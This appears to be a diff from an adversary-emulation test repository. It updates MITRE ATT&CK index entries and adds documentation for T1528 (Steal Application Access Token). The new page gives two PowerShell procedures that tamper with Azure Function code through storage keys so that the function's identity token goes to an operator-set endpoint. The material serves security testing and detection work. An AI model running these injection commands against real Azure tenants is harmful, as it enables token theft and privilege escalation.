      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44673,7 +44672,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44750,7 +44749,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -47874,6 +47872,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -14204,7 +14204,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14281,7 +14281,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44252,7 +44251,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44329,7 +44328,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -47453,6 +47451,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -26105,7 +26105,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -26182,7 +26182,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -75876,7 +75875,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -75953,7 +75952,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -82094,6 +82092,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -0,0 +1,275 @@
+# T1528 - Steal Application Access Token
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1528)
+<blockquote>
+
+Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
+
+Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)  Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.
+
+For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)  
+
+Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges. 
+
+In Azure, an adversary who compromises a resource with an attached Managed Identity, such as an Azure VM, can request short-lived tokens through the Azure Instance Metadata Service (IMDS). These tokens can then facilitate unauthorized actions or further access to other Azure services, bypassing typical credential-based authentication.(Citation: Entra Managed Identities 2025)(Citation: SpecterOps Managed Identity 2022)
+
+Token theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. 
+ 
+Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
+
+Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.  
+
+</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Azure - Functions code upload - Functions code injection via Blob upload](#atomic-test-1---azure---functions-code-upload---functions-code-injection-via-blob-upload)
+
+- [Atomic Test #2 - Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token](#atomic-test-2---azure---functions-code-upload---functions-code-injection-via-file-share-modification-to-retrieve-the-functions-identity-access-token)
+
+
+<br/>
+
+## Atomic Test #1 - Azure - Functions code upload - Functions code injection via Blob upload
+This test injects code into an Azure Function (RCE).
+
+Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
+
+Similar to T1528 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token", the depicted code injection scenario tampers the source code of Azure Functions to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance. In this case, the prepared zip file (underlying package for a Function) is expected to contain the tampered function presented in src/code_to_insert.py. Note that the endpoint https://changeme.net needs to be adapted in your packed function code.
+
+Note:
+- The Azure Function modified in this test must be hosted via Azure Blob storage (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations). 
+- For Function code upload to Azure Functions that are hosted via Azure Files in a File Share, refer to T1528 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token".
+- The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
+
+Requirements:
+- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
+- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| storage_account_name | Name of storage account that is related to the Function | string | storage_account_name_example|
+| container_name | Name of the container that contains the function blob | string | container_name_example|
+| blob_name | Name of the function blob | string | blob_example|
+| file_path_blob | Path to the function code file to upload as blob | path | $env:temp/T1528_function_code.zip|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+az login    # Log in to Azure CLI
+
+$allowSharedKeyAccess = az storage account show --name "#{storage_account_name}" --query "allowSharedKeyAccess"
+
+if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
+    Write-Output "Shared key access is disabled for this storage account."
+} else {    
+    $connectionString = az storage account show-connection-string --name "#{storage_account_name}" --query connectionString --output tsv
+
+    # Download blob for cleanup
+    $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + "#{blob_name}")
+    az storage blob download --connection-string $connectionString --container-name "#{container_name}" --name "#{blob_name}" --file $tmpOriginalFunctionCode --overwrite true
+
+    if ($LASTEXITCODE -eq 0) {
+        # Upload new blob version if download of existing blob succeeded
+        az storage blob upload --connection-string $connectionString --container-name "#{container_name}" --name "#{blob_name}" --file "#{file_path_blob}" --overwrite true
+    } else {
+        Write-Output "Download original function code failed."
+        exit 1
+    }
+}
+```
+
+#### Cleanup Commands:
+```powershell
+az login    # Log in to Azure CLI
+
+# Upload previous funciton code
+$tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + "#{blob_name}")
+az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
+
+if ($LASTEXITCODE -eq 0) {
+    Write-Output "Uploaded original version of function code."
+
+    # Delete tmp original blob file if upload succeeded
+    Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+    Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
+} else {
+    Write-Output "Upload original function code failed."
+}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Azure CLI must be installed
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token
+This test injects code into an Azure Function (RCE) to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance.
+
+Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
+
+Once executed, the "https://changeme" will retrieve the access token when the function app is executed on behalf of the tenant. The function may be triggered manually from authorized people, triggered in regular intervals, or in various other ways. The access token can then be used to perform further attack steps with the permissions that the function app holds (e.g. listening virtual machines).
+
+Note: 
+- The Azure Function modified in this test must be hosted via Azure Files in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
+- For Function code upload to Azure Functions that are hosted via Azure Blob storage, refer to T1528 "Azure - Functions code upload - Functions code injection via Blob upload".
+- The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
+- Important: Change the https://changeme.net in code_to_insert_path to a self-controlled endpoint. This endpoint can be hosted e.g. as request bin via Pipedream to display the body of incoming POST requests.
+- The default injected code to retrieve the access token can be replaced by arbitrary other code. In this case: Replace the code defined in code_to_insert_path
+
+Requirements:
+- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
+- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
+
+Execution options: Defined by the input field execution_option
+- insert_code: This option (1) downloads the existing funciton code into a tmp file, (2) injects the code from code_to_insert_path at the beginning of the file, and (3) uploads the tampered file to the targeted Azure Function code (Azure File Share File).
+- replace_file: This option uploads the function code defined in code_to_insert_path to the targeted Azure Function code (Azure File Share File).
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| storage_account_name | Name of storage account that is related to the Function | string | storage_account_name_example|
+| execution_option | Chooses execution option insert_code, or replace_file | string | insert_code|
+| file_share_name | Name of the file share that is related to the Function | string | file_share_name_example|
+| file_path | Path to the Function file in the file share | path | site/wwwroot/function_app.py|
+| code_to_insert_path | The code that will be injected into the Function | path | $PathToAtomicsFolder/T1528/src/code_to_insert.py|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+az login    # Log in to Azure CLI
+
+$allowSharedKeyAccess = az storage account show --name "#{storage_account_name}" --query "allowSharedKeyAccess"
+
+if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
+    Write-Output "Shared key access is disabled for this storage account."
+} else {
+    # Download file for cleanup
+    $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
+    $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + $tmpOriginalFileName)
+    az storage file download --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --only-show-errors --dest $tmpOriginalFunctionCode
+
+    if ($LASTEXITCODE -eq 0) {
+        # Upload new funciton code if download of existing code succeeded
+        if ("#{execution_option}" -eq "insert_code") {
+            # Download file from file share for injection
+            $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName)
+            az storage file download --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --only-show-errors --dest $tmpFunctionCode
+            
+            if ($LASTEXITCODE -ne 0) {
+                Write-Output "Function code download failed."
+                exit 1
+            }
+            Write-Output "File downloaded: $($tmpFunctionCode)"
+            
+            $insertContent = Get-Content -Path "#{code_to_insert_path}" -Raw  # Load the content of the insert file
+            
+            $content = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file
+            $content = $insertContent + "`n" + $content     # Insert the new code at the beginning
+            $content | Set-Content -Path $tmpFunctionCode       # Write the modified content to the file
+            
+            # Upload file to file share
+            az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpFunctionCode --only-show-errors
+            if ($LASTEXITCODE -ne 0) {
+                Write-Output "Function code upload failed."
+                exit 1
+            }
+            Write-Output "Uploaded the tampered file"
+        } elseif ("#{execution_option}" -eq "replace_file") {
+            az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source "#{code_to_insert_path}" --only-show-errors
+            if ($LASTEXITCODE -ne 0) {
+                Write-Output "Function code upload failed."
+                exit 1
+            }
+            Write-Output "Uploaded the tampered file"
+        } else {
+            Write-Output "Please choose a valid execution_option"
+            exit 1
+        }
+    } else {
+        Write-Output "Download original function code failed."
+        exit 1
+    }
+}
+```
+
+#### Cleanup Commands:
+```powershell
+az login    # Log in to Azure CLI
+
+# Upload previous funciton code
+$tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
+$tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + $tmpOriginalFileName)
+az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
+
+if ($LASTEXITCODE -eq 0) {
+    Write-Output "Uploaded original version of function code."
+
+    # Delete tmp original f file if upload succeeded
+    if ("#{execution_option}" -eq "insert_code") {
+        $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName)
+        Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
+        Write-Output "Deleted tmp file: $($tmpFunctionCode)"
+    }
+
+    # Delete tmp original file
+    Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+    Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
+} else {
+    Write-Output "Upload original function code failed."
+}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Azure CLI must be installed
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az -Force
+```
+
+
+
+
+<br/>